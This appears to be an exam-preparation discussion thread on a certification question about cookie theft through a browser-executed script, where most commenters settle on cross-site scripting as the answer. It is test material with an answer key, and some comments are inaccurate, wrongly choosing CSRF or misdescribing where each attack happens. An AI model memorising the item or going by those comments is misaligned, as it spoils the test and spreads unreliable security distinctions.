An organization recently suffered from a web-application attack that resulted in stolen user session cookie information. The attacker was able to obtain the information when a user's browser executed a script upon visiting a compromised website. What type of attack MOST likely occurred?
The scenario described involves an attacker obtaining user session cookie information through a script executed by the user's browser upon visiting a compromised website. This is indicative of a Cross-Site Scripting (XSS) attack. XSS attacks inject malicious scripts into web pages viewed by other users, allowing attackers to steal cookies and other sensitive information. SQL injection (SQLi) attacks exploit vulnerabilities in SQL queries, XML external entities (XXE) attacks involve the exploitation of XML parsers and processors, and Cross-Site Request Forgery (CSRF) attacks trick users into performing unwanted actions on a web application they are authenticated to. However, none of these other attack types describe the act of executing a malicious script in the user's browser to steal session cookies as specifically and accurately as XSS.
Answer C https://www.fortinet.com/resources/cyberglossary/cross-site-scripting
its C, the stolen session cookie information part of the question is trying to trick you into picking CSRF
C is correct answer. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. https://owasp.org/www-community/attacks/xss/ https://owasp.org/www-community/attacks/csrf
XSS injects a malicious script into a vulnerable website in order to get a user's session cookies when they visit the compromised website. XSRF/CSRF on the other hand only targets the user directly, it does not compromise any website and does not get session cookies.
XSS happen on client side. CSRF happening on web server side.therefore Answer is C
C is correct
Correct answer is C - Cross-site script attack The attacker can compromise the session token by using malicious code or programs running at the client-side. The example shows how the attacker could use an XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker. The example in figure 3 uses an XSS attack to show the cookie value of the current session; using the same technique it’s possible to create a specific JavaScript code that will send the cookie to the attacker. https://owasp.org/www-community/attacks/Session_hijacking_attack
Answer is D CSRF uses the authentication cookie. Cross site request forgery (CSRF) is a web application security attack that tricks a web browser into executing an unwanted action in an application to which a user is already logged in. The attack is also known as XSRF, Sea Surf or Session Riding.
browser executed a script upon visiting a compromised websit A Cross-Site Request Forgery (CSRF) attack occurs when a malicious web site, email, blog, instant message, or program tricks an authenticated user's web browser into performing an unwanted action on a trusted site.
Agree with C - If is a scrypt (JavaScript) in the browser. Def XSS.
Definetely C.
Ignore my comment. I will go with C
XXS: </sript> to load on browser
As an OSCP, CRT, CRTP, CRTO certified, I can confirm that the correct answer is C. Mic drop!